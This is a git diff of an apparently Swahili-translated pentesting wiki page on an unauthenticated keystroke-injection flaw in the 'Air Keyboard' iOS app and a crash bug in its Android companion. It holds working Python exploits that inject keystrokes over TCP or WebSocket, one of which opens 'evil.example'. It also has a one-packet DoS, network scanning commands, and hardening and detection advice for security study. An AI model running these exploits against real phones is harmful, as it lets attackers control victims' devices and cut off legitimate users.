Translated ['src/mobile-pentesting/ios-pentesting/air-keyboard-remote-in

2025-10-10 18:36:50 +00:00 · 2025-07-30 14:16:26 +00:00 · 2025-07-30 14:16:26 +00:00 · e1b916095d
commit e1b916095d
parent ef705ef703
1 changed files with 113 additions and 31 deletions
--- a/src/mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.md
+++ b/src/mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.md
@ -1,18 +1,26 @@
-# Air Keyboard Remote Input Injection (Unauthenticated TCP Listener)
+# Air Keyboard Remote Input Injection (Unauthenticated TCP / WebSocket Listener)

 {{#include ../../banners/hacktricks-training.md}}

 ## TL;DR

-Toleo la iOS la programu ya kibiashara "Air Keyboard" (App Store ID 6463187929) linafungua **huduma ya TCP isiyo na usalama kwenye bandari 8888** inayokubali fremu za funguo **bila uthibitisho wowote**. Kila kifaa kwenye mtandao wa Wi-Fi sawa kinaweza kuungana na bandari hiyo na kuingiza pembejeo za kibodi zisizo na mipaka kwenye simu ya mwathirika, na kufikia **kukamata mwingiliano wa mbali kabisa**.
+Toleo la iOS la programu ya kibiashara **“Air Keyboard”** (App Store ID 6463187929) linaonyesha huduma ya mtandao wa ndani ambayo **inapokea fremu za funguo bila uthibitisho wowote au uthibitisho wa chanzo**. Kulingana na toleo lililowekwa huduma hiyo ni:

-Toleo la Android linalofanana linakusikiliza kwenye **bandari 55535**. Linafanya mkono dhaifu wa AES-ECB, lakini takataka iliyoundwa inasababisha **kosa lisiloshughulikiwa katika utaratibu wa ufichuzi wa OpenSSL**, ikisababisha huduma ya nyuma kuanguka (**DoS**).
+* **≤ 1.0.4**  – msikilizaji wa TCP wa kawaida kwenye **bandari 8888** inayotarajia kichwa cha urefu wa byte 2 kinachofuatiwa na *device-id* na mzigo wa ASCII.
+* **≥ 1.0.5 (Juni 2025)**  – msikilizaji wa **WebSocket** kwenye *bandari hiyo hiyo* (**8888**) inayochambua funguo za **JSON** kama `{"type":1,"text":"…"}`.

-## 1. Service Discovery
+Kila kifaa kwenye Wi-Fi / subnet hiyo hiyo kinaweza hivyo **kuingiza pembejeo za kibodi zisizo na mipaka kwenye simu ya mwathirika, kufikia utekaji wa mwingiliano wa mbali**.
+Kijengwa cha Android kinachosindikiza kinakusikiliza kwenye **bandari 55535**. Kinafanya mkono dhaifu wa AES-ECB lakini takataka iliyoundwa bado inasababisha **kosa lisiloshughulikiwa ndani ya OpenSSL**, ikisababisha huduma ya nyuma kuanguka (**DoS**).
+
+> Uthibitisho wa usalama **bado haujarekebishwa wakati wa kuandika (Julai 2025)** na programu hiyo inapatikana bado kwenye Duka la Programu.
+
+---
+
+## 1. Huduma ya Ugunduzi

 Scan mtandao wa ndani na utafute bandari mbili zilizowekwa zinazotumiwa na programu:
 ```bash
-# iOS (input-injection)
+# iOS (unauthenticated input-injection)
 nmap -p 8888 --open 192.168.1.0/24

 # Android (weakly-authenticated service)
@ -20,72 +28,146 @@ nmap -p 55535 --open 192.168.1.0/24
 ```
 Katika simu za Android unaweza kubaini kifurushi kinachohusika kwa ndani:
 ```bash
-adb shell netstat -tulpn | grep 55535     # no root required on emulator
-
+adb shell netstat -tulpn | grep 55535      # no root required on emulator
 # rooted device / Termux
 netstat -tulpn | grep LISTEN
-ls -l /proc/<PID>/cmdline                # map PID → package name
+ls -l /proc/<PID>/cmdline                 # map PID → package name
 ```
-## 2. Muundo wa Frame (iOS)
+Katika **iOS iliyovunjwa** unaweza kufanya kitu kinachofanana na `lsof -i -nP | grep LISTEN | grep 8888`.

-Binary inafichua mantiki ifuatayo ya uchambuzi ndani ya utaratibu wa `handleInputFrame()`:
+---
+
+## 2. Maelezo ya Protokali (iOS)
+
+### 2.1  Urithi (≤ 1.0.4) – fremu za binary za kawaida
 ```
 [length (2 bytes little-endian)]
 [device_id (1 byte)]
 [payload ASCII keystrokes]
 ```
-Urefu ulioelezwa unajumuisha byte ya `device_id` **lakini sio** kichwa cha byte mbili yenyewe.
+Ilani ya *urefu* inajumuisha byte ya `device_id` **lakini sio** kichwa cha byte mbili yenyewe.
+
+### 2.2  Sasa (≥ 1.0.5) – JSON kupitia WebSocket
+
+Toleo 1.0.5 lilihamishwa kimya kimya kwenda WebSockets huku likihifadhi nambari ya bandari bila kubadilisha. Kichocheo kidogo cha funguo kinaonekana kama:
+```json
+{
+"type": 1,              // 1 = insert text, 2 = special key
+"text": "open -a Calculator\n",
+"mode": 0,
+"shiftKey": false,
+"selectionStart": 0,
+"selectionEnd": 0
+}
+```
+Hakuna mkono wa mkono, token au saini inayohitajika - kitu cha kwanza cha JSON tayari kinachochea tukio la UI.
+
+---

 ## 3. Utekelezaji PoC
+
+### 3.1 Kulenga ≤ 1.0.4 (raw TCP)
 ```python
 #!/usr/bin/env python3
-"""Inject arbitrary keystrokes into Air Keyboard for iOS"""
+"""Inject arbitrary keystrokes into Air Keyboard ≤ 1.0.4 (TCP mode)"""
 import socket, sys

-target_ip = sys.argv[1]                  # e.g. 192.168.1.50
-keystrokes = b"open -a Calculator\n"     # payload visible to the user
+target_ip  = sys.argv[1]                 # e.g. 192.168.1.50
+keystrokes = b"open -a Calculator\n"    # payload visible to the user

 frame  = bytes([(len(keystrokes)+1) & 0xff, (len(keystrokes)+1) >> 8])
-frame += b"\x01"                         # device_id = 1 (hard-coded)
+frame += b"\x01"                        # device_id = 1 (hard-coded)
 frame += keystrokes

 with socket.create_connection((target_ip, 8888)) as s:
 s.sendall(frame)
-print("Injected", keystrokes)
+print("[+] Injected", keystrokes)
 ```
-Any printable ASCII (including `\n`, `\r`, special keys, etc.) can be sent, effectively granting the attacker the same power as physical user input: launching apps, sending IMs, visiting phishing URLs, etc.
+### 3.2  Kulenga ≥ 1.0.5 (WebSocket)
+```python
+#!/usr/bin/env python3
+"""Inject keystrokes into Air Keyboard ≥ 1.0.5 (WebSocket mode)"""
+import json, sys, websocket  # `pip install websocket-client`
+
+target_ip = sys.argv[1]
+ws        = websocket.create_connection(f"ws://{target_ip}:8888")
+ws.send(json.dumps({
+"type": 1,
+"text": "https://evil.example\n",
+"mode": 0,
+"shiftKey": False,
+"selectionStart": 0,
+"selectionEnd": 0
+}))
+ws.close()
+print("[+] URL opened on target browser")
+```
+*ASCII yoyote inayoweza kuchapishwa — ikiwa ni pamoja na line-feeds, tabs na funguo nyingi maalum — inaweza kutumwa, ikimpa mshambuliaji nguvu sawa na ingizo la mtumiaji wa kimwili: kuzindua programu, kutuma IMs, kufungua URL za uharibifu, kubadilisha mipangilio, n.k.*
+
+---

 ## 4. Android Companion – Denial-of-Service

-The Android port (55535) expects a 4-character password encrypted with a **hard-coded AES-128-ECB key** followed by a random nonce.  Parsing errors bubble up to `AES_decrypt()` and are not caught, terminating the listener thread.  A single malformed packet is therefore enough to keep legitimate users disconnected until the process is relaunched.
+Bandari ya Android (55535) inatarajia **neno la siri la herufi 4 lililofichwa kwa kutumia funguo za AES-128-ECB zilizowekwa kwa ngumu** ikifuatiwa na nonce ya nasibu. Makosa ya uchambuzi yanapanda hadi `AES_decrypt()` na hayakamatwi, yakimaliza nyuzi za msikilizaji. Paket moja iliyo na makosa inatosha kuwafanya watumiaji halali wawe nje ya mtandao hadi mchakato urudiwa.
 ```python
 import socket
 socket.create_connection((victim, 55535)).send(b"A"*32)  # minimal DoS
 ```
-## 5. Sababu Kuu
+---
+
+## 5. Programu Zinazohusiana – Mfano wa Mara kwa Mara wa Kupinga
+
+Air Keyboard **siyo kesi ya pekee**. Programu nyingine za simu za “remote keyboard/mouse” zimekuja na kasoro hiyo hiyo:
+
+* **Telepad ≤ 1.0.7** – CVE-2022-45477/78 inaruhusu utekelezaji wa amri zisizo na uthibitisho na uandishi wa funguo za maandiko wazi.
+* **PC Keyboard ≤ 30** – CVE-2022-45479/80 RCE isiyo na uthibitisho & ufuatiliaji wa trafiki.
+* **Lazy Mouse ≤ 2.0.1** – CVE-2022-45481/82/83 hakuna-siri ya chaguo-msingi, PIN dhaifu ya nguvu na uvujaji wa maandiko wazi.
+
+Mifano hii inaonyesha kutokujali kwa mfumo wa **uso wa mashambulizi yanayoelekezwa kwenye mitandao katika programu za simu**.
+
+---
+
+## 6. Sababu za Msingi

 1. **Hakuna ukaguzi wa asili / uaminifu** kwenye fremu zinazokuja (iOS).
-2. **Matumizi mabaya ya cryptographic** (funguo za kudumu, ECB, ukosefu wa uthibitisho wa urefu) na **ukosefu wa usimamizi wa makosa** (Android).
+2. **Matumizi mabaya ya cryptographic** (funguo ya kudumu, ECB, ukosefu wa uthibitisho wa urefu) na **ukosefu wa usimamizi wa makosa** (Android).
+3. **Haki ya Mtumiaji ya Mtandao wa Mitaa ≠ usalama** – iOS inahitaji idhini ya wakati wa kukimbia kwa trafiki ya LAN, lakini haitoi uthibitisho sahihi.

-## 6. Njia za Kupunguza na Wazo za Kuimarisha
+---

-* Kamwe usifichue huduma zisizo na uthibitisho kwenye simu ya mkononi.
-* Pata siri za kifaa kila wakati wakati wa kuanzisha na uziangaliye kabla ya kushughulikia ingizo.
-* Fungamanisha msikilizaji na `127.0.0.1` na tumia usafirishaji wa siri, unaothibitishwa kwa pamoja (mfano, TLS, Noise) kwa udhibiti wa mbali.
-* Gundua bandari zisizotarajiwa zilizo wazi wakati wa mapitio ya usalama wa simu (`netstat`, `lsof`, `frida-trace` kwenye `socket()` n.k.).
-* Kama mtumiaji wa mwisho: ondoa Air Keyboard au itumie tu kwenye mitandao ya Wi-Fi iliyothibitishwa na iliyotengwa.
+## 7. Kuimarisha & Hatua za Kijamii
+
+Mapendekezo ya waendelezaji:
+
+* Fungamanisha msikilizaji na **`127.0.0.1`** na tunnel kupitia **mTLS** au **Noise XX** ikiwa udhibiti wa mbali unahitajika.
+* Pata **siri za kifaa kila wakati wakati wa kuanzisha** (mfano, QR code au PIN ya Kuunganisha) na kulazimisha *uthibitisho wa pamoja* kabla ya kushughulikia ingizo.
+* Adopt **Apple Network Framework** na *NWListener* + TLS badala ya soketi za kawaida.
+* Tekeleza **ukaguzi wa akili wa urefu** na usimamizi wa makosa ulioandaliwa wakati wa kufungua au kufasiri fremu.
+
+Mafanikio ya haraka ya Blue-/Red-Team:
+
+* **Uwindaji wa Mtandao:** `sudo nmap -n -p 8888,55535 --open 192.168.0.0/16` au chujio cha Wireshark `tcp.port == 8888`.
+* **Ukaguzi wa wakati wa kukimbia:** Skripti ya Frida inashikilia `socket()`/`NWConnection` ili orodhesha wasikilizaji wasiotarajiwa.
+* **Ripoti ya Faragha ya Programu ya iOS (Mipangilio ▸ Faragha & Usalama ▸ Ripoti ya Faragha ya Programu)** inaonyesha programu zinazowasiliana na anwani za LAN – muhimu kwa kugundua huduma za uasi.
+* **Mobile EDRs** zinaweza kuongeza sheria rahisi za Yara-L kwa funguo za JSON `"selectionStart"`, `"selectionEnd"` ndani ya mzigo wa TCP wa maandiko wazi kwenye bandari 8888.
+
+---

 ## Karatasi ya Udhibiti (Pentesters)
 ```bash
-# Quick one-liner to locate vulnerable devices in a /24
-nmap -n -p 8888,55535 --open 192.168.1.0/24 -oG - | awk '/Ports/{print $2,$3,$4}'
+# Locate vulnerable devices in a /24 and print IP + list of open risky ports
+nmap -n -p 8888,55535 --open 192.168.1.0/24 -oG - \
+| awk '/Ports/{print $2 "  " $4}'

 # Inspect running sockets on a connected Android target
-adb shell "for p in $(lsof -PiTCP -sTCP:LISTEN -n -t); do echo -n \"$p → "; cat /proc/$p/cmdline; done"
+adb shell "for p in $(lsof -PiTCP -sTCP:LISTEN -n -t); do \
+echo -n \"$p → \"; cat /proc/$p/cmdline; done"
 ```
+---
+
 ## Marejeo

- [Uthibitisho wa Uwezo wa Kuingilia Kuingia kwa Mbali katika Programu ya Air Keyboard iOS Bado Haijarekebishwa](https://www.mobile-hacker.com/2025/07/17/remote-input-injection-vulnerability-in-air-keyboard-ios-app-still-unpatched/)
- [CXSecurity taarifa WLB-2025060015](https://cxsecurity.com/issue/WLB-2025060015)
+- [Exploit-DB 52333 – Air Keyboard iOS App 1.0.5 Remote Input Injection](https://www.exploit-db.com/exploits/52333)
+- [Mobile-Hacker Blog (17 Jul 2025) – Remote Input Injection Vulnerability in Air Keyboard iOS App Still Unpatched](https://www.mobile-hacker.com/2025/07/17/remote-input-injection-vulnerability-in-air-keyboard-ios-app-still-unpatched/)

 {{#include ../../banners/hacktricks-training.md}}